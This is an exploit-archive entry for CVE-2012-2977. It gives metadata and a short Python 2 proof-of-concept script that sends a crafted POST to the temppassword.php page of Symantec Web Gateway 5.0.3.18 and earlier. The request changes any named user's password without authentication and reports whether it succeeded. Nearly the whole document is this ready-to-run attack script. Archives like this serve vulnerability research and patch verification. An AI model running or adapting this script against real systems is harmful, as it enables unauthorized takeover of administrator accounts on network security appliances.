Symantec Web Gateway 5.0.3.18 - Arbitrary Password Change

Author: Kc57
type: webapps
platform: linux
port: 
date_added: 2012-08-21 
date_updated: 2012-08-21 
verified: 1 
codes: CVE-2012-2977;OSVDB-84122 
tags: 
aliases:  
screenshot_url:  
application_url: 

#!/usr/bin/python

import urllib
import urllib2
import re
import sys

print "[*] ###########################################################"
print "[*] Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change"
print "[*] @_Kc57"
print "[*] ###########################################################\n"


if (len(sys.argv) != 4):
	print "Usage: poc.py <RHOST> <username> <newpassword>"
	exit(0)

ip = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]

url = "https://%s/spywall/temppassword.php" % (ip)

opts = {
	'target':'executive_summary.php',
	'USERNAME':username,
	'password':password,
	'password2':password,
	'Save':'Save'
}

print "[*] Sending request to server..."

data = urllib.urlencode(opts)
request = urllib2.Request(url, data)
response = urllib2.urlopen(request)

match = re.search('Your new password has been saved', response.read())

if(match):
	print "[*] Password for %s changed to %s" %(username,password)
else:
	print "[*] Password change failed!"